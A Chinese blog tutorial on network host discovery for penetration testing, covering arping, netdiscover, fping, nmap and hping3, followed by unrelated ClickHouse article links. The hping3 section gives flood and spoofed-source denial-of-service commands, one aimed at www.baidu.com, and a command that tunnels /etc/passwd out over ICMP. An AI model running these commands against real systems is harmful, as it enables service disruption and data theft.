web渗透—主机发现

最新推荐文章于 2024-06-20 18:25:34 发布
最新推荐文章于 2024-06-20 18:25:34 发布
阅读量152 收藏
点赞数
文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50992624/article/details/128351063
版权

信息收集是web渗透,漏洞挖掘的前期工作
信息收集分为主动收集和被动收集
主动收集:通过直接访问,扫描网站,这种将流量流经网站的行为,如nmap扫描端口
被动收集:利用第三方服务对目标进行访问,比如通过搜索引擎搜索,防止被发现

主动收集

二层主动发现

1.arping
arp地址解析协议,根据ip找mac地址
但是需要注意的是arp只能在局域网中解析,不能跨网段解析的
在这里插入图片描述
可以看到4个包被收到了,表示主机存活

当有多块网卡的时候,指定特定的设备来发送请求包
arping -i eth1 -c 1 192.168.131.155

2.netdiscover
netdiscover也是arp二层侦探工具,但是可以一次性侦探一个网段内在线的主机,支持主动及被动侦探

被动扫描,不发送任何内容,只发送嗅探针
netdiscover -p
netdiscover -i eth0 -r 192.168.31.0/24 -p
在这里插入图片描述
主动扫描一个网段
netdiscover -i eth0 -r 192.168.152.0/24
在这里插入图片描述

三层发现

ping
ping -c 3 192.68.131.24

  • -c 后接次数

fping
和ping命令相比,可以ping多个地址,或者一个网段的地址
fping -s -g 192.168.152.130 192.168.152.140 ping一段地址
在这里插入图片描述

fping 50.116.66.139 173.194.35.35 98.139.183.24 ping多个地址

fping -ags 192.168.152.0/24 > test.txt ping一个网段地址

  • -a alive存活
  • -s stat 打印状态
  • -g generate 一个区间段
    在这里插入图片描述

hping3
hping3 命令可以进行简单的dos攻击!!!!

hping3 -c 100000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com
hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood -a 192.168.152.31 192.168.152.31

  • -c 接发送请求次数

  • -d 发送数据包大小

  • -S set sync flag 建立sync连接,也就是对方需要和我进行三次握手,以占用资源
    在这里插入图片描述

  • -w 滑动窗口,发送字节大小

  • –flood 尽快发送数据包,不显示回复

  • –rand-source 源地址欺

  • -a 源地址欺骗

  • -I 接指定网口
    *-i 接等待攻击的时间

以 LandAttack 方式测试目标防火墙 (Land Attack 是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

使用 Hping3 可以很方便构建拒绝服务攻击。比如对目标机发起大量 SYN 连接,伪造源地址为 192.168.10.99,并使用1000微秒的间隔发送各个 SYN 包
hping3 -a 192.168.10.99 -S -i u1000 -I eth0 123.123.23.23 -p 80

Hping3 支持通过 TCP/UDP/ICMP 等包来进行文件传输。相当于借助 TCP/UDP/ICMP 包建立隐秘隧道通讯。实现方式是开启监听端口,对检测到的签名 (签名为用户指定的字符串) 的内容进行相应的解析。

在接收端开启服务:
hping3 192.168.1.159 --listen signature --safe --icmp
监听 ICMP 包中的签名,根据签名解析出文件内容。

在发送端使用签名打包的 ICMP 包发送文件:
hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd
将 /etc/passwd 密码文件通过 ICMP 包传给 192.168.1.108 主机。发送包大小为100字节 (-d 100),发送签名为 signature (–sign signature)。

四层发现

nmap
nmap是一个网络探测和安全扫描程序,可获取主机信息,及主机上的服务信息

  • 扫描一个机器的所有进程服务
    namp xxx.xxx.xxx.xxx
    在这里插入图片描述
  • 只扫描1-200端口的服务
    nmap -P 1-200 192.168.152.135
  • 扫描操作系信息
    nmap -o -P 1-5000 xxx.xxx.xxx.xxx
  • 扫描多个地址
    nmap 192.168.152.135 192.168.152.138
  • 扫描一个地址段
    nmap 192.168.152.135-250
  • 查看运用TCP/UDP技术扫描192.168.152.130的情况
    nmap -sT 192.168.152.130
    nmap -sU 192.168.152.130
我没性感泳衣
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
篇二|什么是ClickHouse引擎?
jmx_bigdata的博客
09-21 2051
在上一篇分享中,我们介绍了ClickHouse的安装部署和简单使用。本文将介绍ClickHouse中一个非常重要的概念—引擎(table engine)。如果对MySQL熟悉的话,或许你应该听说过InnoDB和MyISAM存储引擎。不同的存储引擎提供不同的存储机制、索引方式、锁定水平等功能,也可以称之为类型。ClickHouse提供了丰富的引擎,这些不同的引擎也代着不同的类型。比如数据拥有何种特性、数据以何种形式被存储以及如何被加载。本文会对ClickHouse中常见的引擎进行介绍,主要包括
ClickHouse引擎
qq_41466440的博客
12-09 219
clickhouse引擎
详解 ClickHouse引擎
最新发布
weixin_44480009的博客
06-20 1366
引擎决定了如何存储的数据。包括:数据的存储方式和位置,写到哪里以及从哪里读取数据支持哪些查询以及如何支持并发数据访问索引的使用(如果存在)是否可以执行多线程请求数据复制参数引擎的使用方式:必须显式在创建时定义该使用的引擎,以及引擎使用的相关参数。特别注意:引擎的名称大小写敏感。
(04)引擎
song_quan_的博客
07-30 298
4.1 引擎的使用 引擎ClickHouse 的一大特色。可以说, 引擎决定了如何存储标的数据。包括: ➢ 数据的存储方式和位置,写到哪里以及从哪里读取数据 ➢ 支持哪些查询以及如何支持。 ➢ 并发数据访问。 ➢ 索引的使用(如果存在)。 ➢ 是否可以执行多线程请求。 ➢ 数据复制参数。 引擎的使用方式就是必须显式在创建时定义该使用的引擎,以及引擎使用的相关参数。 特别注意:引擎的名称大小写敏感 4.2 TinyLog
ClickHouse数据引擎总结
aouoy的博客
08-12 1630
ClickHouse提供了大量的数据引擎,分为数据库引擎引擎,根据数据特点及使用场景选择合适的引擎至关重要,这里根据资料做一些总结数据库引擎默认是Ordinary,在这种数据库下面的可以是任意类型引擎。 生产环境中常用的引擎是MergeTree系列,也是官方主推的引擎。MergeTree是基础引擎,有主键索引、数据分区、数据副本、数据采样、删除和修改等功能,ReplacingMergeTree有了去重功能,SummingMergeTree有了汇总求和功能,AggregatingMergeTre
ClickHouse-架构原理和引擎详解
03-04
### ClickHouse-架构原理和引擎详解 #### 一、ClickHouse概述与设计思想 **1.1 ClickHouse简介** ClickHouse是一款专为在线分析处理(OLAP)设计的列式数据库管理系统(DBMS),最初由俄罗斯搜索引擎巨头Yandex开发...
ClickHouse学习笔记总结
04-30
ClickHouse是一款高性能...总结ClickHouse作为一款强大的列式数据库,以其出色的查询性能和分布式处理能力,在大数据分析领域独树一帜。了解并掌握ClickHouse的相关知识,将有助于我们更高效地处理和分析大规模数据。
clickhouse
11-19
通过其独特的数据存储方式和强大的查询引擎ClickHouse能够满足现代数据分析的需求。无论是日志分析、业务智能还是物联网数据处理,ClickHouse都能提供高效可靠的解决方案。对于那些需要处理大量数据的企业而言,...
clickhouse文档.docx
09-17
ClickHouse支持多种引擎,每种引擎都有其特定的用途。例如,MergeTree是最常用的引擎,适合处理大量实时插入和快速查询的数据。它将数据按照主键排序并自动合并小文件以优化读取性能。除此之外,还有Memory引擎...
Doris和ClickHouse对比简介
03-07
为了直观展示Doris与ClickHouse的性能差异,进行了SSB(Star Schema Benchmark)单性能测试。测试环境为三台阿里云主机,配置为Intel(R) Xeon(R) Platinum 8269CY CPU @ 2.50GHz,内存容量为64GB,网络带宽10Gbits...
clickhouse引擎
mo
08-16 909
clickhouse同mysql一样,有着属于自己的很多引擎引擎(即的类型)决定了: 数据的存储方式和位置,写到哪里以及从哪里读取数据 支持哪些查询以及如何支持。 并发数据访问。 索引的使用(如果存在)。 是否可以执行多线程请求。 数据复制参数。 对于ck来说,目前位置包含了以下部分引擎: 1.集成外部系统的引擎,支持方式有kafka,JDBC,ODBC,HDFS等 2.合并树家族(最为常用且重要) 3.日志家族 4.一些特别的引擎,如字典,视图,集合,合并等。 1.TinyLog(很少
ClickHouse引擎
YYDS_emmm的博客
09-07 492
ClickHouse引擎 引擎ClickHouse 的一大特色。可以说, 引擎决定了如何存储的数据。 包括: 数据的存储方式和位置,写到哪里以及从哪里读取数据。 支持哪些查询以及如何支持。 并发数据访问。 索引的使用(如果存在)。 是否可以执行多线程请求。 数据复制参数。 引擎的使用方式就是必须显式在创建时定义该使用的引擎,以及引擎 使用的相关参数。 特别注意:引擎的名称大小写敏感。 分类: Log 系列引擎 TinyLog 是 Log 系列引擎中功能简单、性能较低的引擎。它的存
『 白话课堂 』详谈 ClickHouse引擎
北慕辰的博客,欢迎各位大佬光临!!
05-25 2719
一、ClickHouse引擎 是什么? 二、ClickHouse 引擎 有什么作用 三、ClickHouse引擎 有哪几种? 四、 ClickHouse引擎 分别有什么特点?
ClickHouse引擎详解看这篇就够了-基本讲解、处理逻辑、测试实例
weixin_43805705的博客
01-03 2176
引擎ClickHouse 中的作用十分关键,直接决定了数据如何存储和读取、是否支持并发读写、是否支持 index、支持的 query 种类、是否支持主备复制等。 ClickHouse引擎一共分为四个系列,分别是Log、MergeTree、Integration、Special。其中包含了两种特殊的引擎Replicated、Distributed,功能上与其他引擎正交,根据场景组合使用。
ClickHouse引擎详解
weixin_59295776的博客
03-12 1852
共同属性数据存储在磁盘上 写入时将数据追加在文件末尾 不支持突变(Mutation)操作 不支持索引(这意味着。
大数据(5o)ClickHouse常用引擎
ArYe
09-25 747
合并树家族 MergeTree 排序键 主键 分区 数据生命周期 其它设置 ReplacingMergeTree SummingMergeTree 日志家族 其它 内存引擎 引擎 引擎作用: 数据的存储方式和位置 支持哪些查询以及如何支持 并发数据访问 索引的使用(如果存在) 是否可以执行多线程请求 数据复制参数
ClickHouse学习笔记之引擎
四国棋客
09-03 766
引擎ClickHouse一大特色,决定了数据的存储方式。引擎使用时必须显式在创建时定义该使用的引擎,以及引擎参数,注意引擎名大小写敏感
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值